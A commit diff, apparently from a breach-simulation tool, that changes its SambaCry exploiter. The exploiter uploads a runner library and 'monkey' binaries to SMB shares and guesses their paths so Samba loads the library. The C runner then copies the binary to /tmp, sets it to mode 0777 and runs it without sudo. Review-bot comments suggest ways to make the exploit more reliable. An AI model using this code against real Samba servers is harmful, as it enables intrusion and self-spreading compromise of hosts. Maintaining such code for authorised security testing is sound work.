Fix SambaCry not working for non-root user
This commit is contained in:
parent
62713932de
commit
65872d9518
|
@ -111,7 +111,7 @@ class Configuration(object):
|
|||
# dropper config
|
||||
###########################
|
||||
|
||||
dropper_try_move_first = sys.argv[0].endswith(".exe")
|
||||
dropper_try_move_first = True
|
||||
dropper_set_date = True
|
||||
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
||||
dropper_date_reference_path_linux = '/bin/sh'
|
||||
|
@ -260,22 +260,6 @@ class Configuration(object):
|
|||
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
||||
# Shares to not check if they're writable.
|
||||
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
||||
# Name of file which contains the monkey's commandline
|
||||
sambacry_commandline_filename = "monkey_commandline.txt"
|
||||
# Name of file which contains the runner's result
|
||||
sambacry_runner_result_filename = "monkey_runner_result"
|
||||
# SambaCry runner filename (32 bit)
|
||||
sambacry_runner_filename_32 = "sc_monkey_runner32.so"
|
||||
# SambaCry runner filename (64 bit)
|
||||
sambacry_runner_filename_64 = "sc_monkey_runner64.so"
|
||||
# Monkey filename on share (32 bit)
|
||||
sambacry_monkey_filename_32 = "monkey32"
|
||||
# Monkey filename on share (64 bit)
|
||||
sambacry_monkey_filename_64 = "monkey64"
|
||||
# Monkey copy filename on share (32 bit)
|
||||
sambacry_monkey_copy_filename_32 = "monkey32_2"
|
||||
# Monkey copy filename on share (64 bit)
|
||||
sambacry_monkey_copy_filename_64 = "monkey64_2"
|
||||
|
||||
# system info collection
|
||||
collect_system_info = True
|
||||
|
|
|
@ -27,7 +27,7 @@
|
|||
|
||||
"kill_file_path_linux": "/var/run/monkey.not",
|
||||
"kill_file_path_windows": "%windir%\\monkey.not",
|
||||
"dropper_try_move_first": false,
|
||||
"dropper_try_move_first": true,
|
||||
"exploiter_classes": [
|
||||
"SSHExploiter",
|
||||
"SmbExploiter",
|
||||
|
@ -70,14 +70,6 @@
|
|||
"sambacry_trigger_timeout": 5,
|
||||
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
|
||||
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
||||
"sambacry_commandline_filename": "monkey_commandline.txt",
|
||||
"sambacry_runner_result_filename": "monkey_runner_result",
|
||||
"sambacry_runner_filename_32": "sc_monkey_runner32.so",
|
||||
"sambacry_runner_filename_64": "sc_monkey_runner64.so",
|
||||
"sambacry_monkey_filename_32": "monkey32",
|
||||
"sambacry_monkey_filename_64": "monkey64",
|
||||
"sambacry_monkey_copy_filename_32": "monkey32_2",
|
||||
"sambacry_monkey_copy_filename_64": "monkey64_2",
|
||||
"local_network_scan": false,
|
||||
"tcp_scan_get_banner": true,
|
||||
"tcp_scan_interval": 200,
|
||||
|
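Review bot: `sambacry_folder_paths_to_guess` begins with `""` in this file but with `'/'` in the Python `Configuration` default shown above, and the exploiter builds its guesses with `posixpath.join(folder, share_name, file_name)`, so the empty prefix yields the relative path `share/sc_monkey_runner64.so` while `'/'` yields `/share/sc_monkey_runner64.so`. The two defaults should agree, presumably on `"/"` unless the relative form is intentional; this is a context line the commit leaves in place, but it is the only remaining SambaCry knob in this file after the deletion hunk, so it is worth settling here.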
|
|
@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter):
|
|||
"""
|
||||
_target_os_type = ['linux']
|
||||
|
||||
# Name of file which contains the monkey's commandline
|
||||
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
|
||||
# Name of file which contains the runner's result
|
||||
SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result"
|
||||
# SambaCry runner filename (32 bit)
|
||||
SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so"
|
||||
# SambaCry runner filename (64 bit)
|
||||
SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so"
|
||||
# Monkey filename on share (32 bit)
|
||||
SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
|
||||
# Monkey filename on share (64 bit)
|
||||
SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
|
||||
# Monkey copy filename on share (32 bit)
|
||||
SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
|
||||
# Monkey copy filename on share (64 bit)
|
||||
SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
|
||||
|
||||
def __init__(self):
|
||||
self._config = __import__('config').WormConfiguration
|
||||
|
||||
|
@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter):
|
|||
"""
|
||||
smb_client = self.connect_to_server(ip, creds)
|
||||
tree_id = smb_client.connectTree(share)
|
||||
file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename,
|
||||
self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64,
|
||||
self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64,
|
||||
self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64]
|
||||
file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||
self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
|
||||
self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
|
||||
|
||||
for filename in file_list:
|
||||
try:
|
||||
|
@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter):
|
|||
tree_id = smb_client.connectTree(share)
|
||||
file_content = None
|
||||
try:
|
||||
file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename,
|
||||
file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||
desiredAccess=FILE_READ_DATA)
|
||||
file_content = smb_client.readFile(tree_id, file_id)
|
||||
smb_client.closeFile(tree_id, file_id)
|
||||
|
@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter):
|
|||
|
||||
with self.get_monkey_commandline_file(host, depth,
|
||||
self._config.dropper_target_path_linux) as monkey_commandline_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
|
||||
|
||||
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
|
||||
|
||||
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
|
||||
|
||||
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
||||
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
||||
|
||||
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
|
||||
|
||||
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read)
|
||||
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
|
||||
|
||||
smb_client.disconnectTree(tree_id)
|
||||
|
||||
|
@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter):
|
|||
:return: Array of possible full paths to the module.
|
||||
"""
|
||||
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
||||
file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64]
|
||||
file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
|
||||
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
||||
|
||||
def get_monkey_runner_bin_file(self, is_32bit):
|
||||
if is_32bit:
|
||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb")
|
||||
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
|
||||
else:
|
||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
|
||||
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
|
||||
|
||||
def get_monkey_commandline_file(self, host, depth, location):
|
||||
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
|
||||
|
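Review bot: The new class constants duplicate strings that `sc_monkey_runner.c` also hard-codes (`RUNNER_FILENAME`, `MONKEY_NAME`, `RUNNER_RESULT_FILENAME`, `COMMANDLINE_FILENAME`), and with the config knobs removed nothing ties the two copies together; a comment above `SAMBACRY_COMMANDLINE_FILENAME` such as `# NOTE: these must match the literals in sc_monkey_runner.c — the runner locates them on the share by name` would keep a later rename on one side from silently breaking the exploit. `SAMBACRY_MONKEY_COPY_FILENAME_32` and `_64` are not referenced in any visible hunk now that both the cleanup list and the runner stopped using the copy names, so they look like dead constants unless used elsewhere in the file. The cleanup list drops the copy names because the runner now writes the binary to `/tmp/monkey` on the target rather than to the share, but that file is outside the share and so is not removed by this method; its docstring, which starts above the hunk, should say so. The method containing the cleanup list and the one containing the path guesses both begin outside their hunks.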
|
|
@ -1,9 +1,9 @@
|
|||
#!/usr/bin/env bash
|
||||
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
|
||||
gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o
|
||||
gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o
|
||||
rm sc_monkey_runner.o
|
||||
strip sc_monkey_runner_64.so
|
||||
strip sc_monkey_runner64.so
|
||||
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
|
||||
gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o
|
||||
gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o
|
||||
rm sc_monkey_runner.o
|
||||
strip sc_monkey_runner_32.so
|
||||
strip sc_monkey_runner32.so
|
|
@ -22,16 +22,16 @@ int samba_init_module(void)
|
|||
#ifdef ARCH_IS_64
|
||||
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
|
||||
const char MONKEY_NAME[] = "monkey64";
|
||||
const char MONKEY_COPY_NAME[] = "monkey64_2";
|
||||
#else
|
||||
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
|
||||
const char MONKEY_NAME[] = "monkey32";
|
||||
const char MONKEY_COPY_NAME[] = "monkey32_2";
|
||||
#endif
|
||||
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
|
||||
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
|
||||
const int ACCESS_MODE = 0777;
|
||||
const char RUN_MONKEY_CMD[] = "sudo ./";
|
||||
const char RUN_MONKEY_CMD[] = "./";
|
||||
const char MONKEY_DEST_FOLDER[] = "/tmp";
|
||||
const char MONKEY_DEST_NAME[] = "monkey";
|
||||
|
||||
int found = 0;
|
||||
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
|
||||
|
@ -102,7 +102,7 @@ int samba_init_module(void)
|
|||
|
||||
// Build commandline
|
||||
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
||||
strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1);
|
||||
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
|
||||
strncat(commandline, " ", 1);
|
||||
|
||||
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
||||
|
@ -133,7 +133,12 @@ int samba_init_module(void)
|
|||
fread(monkeyBinary, 1, monkeySize, pFile);
|
||||
fclose(pFile);
|
||||
|
||||
pFile = fopen(MONKEY_COPY_NAME, "wb");
|
||||
if (0 != chdir(MONKEY_DEST_FOLDER))
|
||||
{
|
||||
return 0;
|
||||
}
|
||||
|
||||
pFile = fopen(MONKEY_DEST_NAME, "wb");
|
||||
if (NULL == pFile)
|
||||
{
|
||||
free(monkeyBinary);
|
||||
|
@ -144,7 +149,7 @@ int samba_init_module(void)
|
|||
free(monkeyBinary);
|
||||
|
||||
// Change monkey permissions
|
||||
if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE))
|
||||
if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE))
|
||||
{
|
||||
return 0;
|
||||
}
|
||||
|
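Review bot: The new `chdir(MONKEY_DEST_FOLDER)` failure path returns without releasing `monkeyBinary`, which the `fread` just above has already filled, while the `NULL == pFile` branch directly below does free it; add `free(monkeyBinary);` before that `return 0;`. Writing to the fixed name `monkey` under world-writable `/tmp` with `fopen(..., "wb")` follows a symlink a local user may have planted there beforehand, so the smbd process can be made to truncate a file it owns; `open(MONKEY_DEST_NAME, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0700)` followed by `fdopen` avoids that. The following `chmod(MONKEY_DEST_NAME, ACCESS_MODE)` with `ACCESS_MODE` = 0777 then leaves a world-writable executable in `/tmp`; 0700 is sufficient, since the same process executes it via `./` now that the `sudo` prefix is gone. With its `strncat`, `fopen` and `chmod` uses removed by these hunks, `MONKEY_COPY_NAME` may now be an unused local, which the `-Wall -Werror` build in the accompanying script would reject; check for remaining references. `samba_init_module` starts and ends outside the hunks.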
|
|
@ -587,46 +587,6 @@ SCHEMA = {
|
|||
"IPC$", "print$"
|
||||
],
|
||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||
},
|
||||
"sambacry_commandline_filename": {
|
||||
"title": "SambaCry commandline filename",
|
||||
"type": "string",
|
||||
"default": "monkey_commandline.txt",
|
||||
},
|
||||
"sambacry_runner_result_filename": {
|
||||
"title": "SambaCry runner result filename",
|
||||
"type": "string",
|
||||
"default": "monkey_runner_result",
|
||||
},
|
||||
"sambacry_runner_filename_32": {
|
||||
"title": "SambaCry runner filename (32 bit)",
|
||||
"type": "string",
|
||||
"default": "sc_monkey_runner32.so",
|
||||
},
|
||||
"sambacry_runner_filename_64": {
|
||||
"title": "SambaCry runner filename (64 bit)",
|
||||
"type": "string",
|
||||
"default": "sc_monkey_runner64.so",
|
||||
},
|
||||
"sambacry_monkey_filename_32": {
|
||||
"title": "SambaCry monkey filename (32 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey32",
|
||||
},
|
||||
"sambacry_monkey_filename_64": {
|
||||
"title": "SambaCry monkey filename (64 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey64",
|
||||
},
|
||||
"sambacry_monkey_copy_filename_32": {
|
||||
"title": "SambaCry monkey copy filename (32 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey32_2",
|
||||
},
|
||||
"sambacry_monkey_copy_filename_64": {
|
||||
"title": "SambaCry monkey copy filename (64 bit)",
|
||||
"type": "string",
|
||||
"default": "monkey64_2",
|
||||
}
|
||||
}
|
||||
},
|
||||
|
|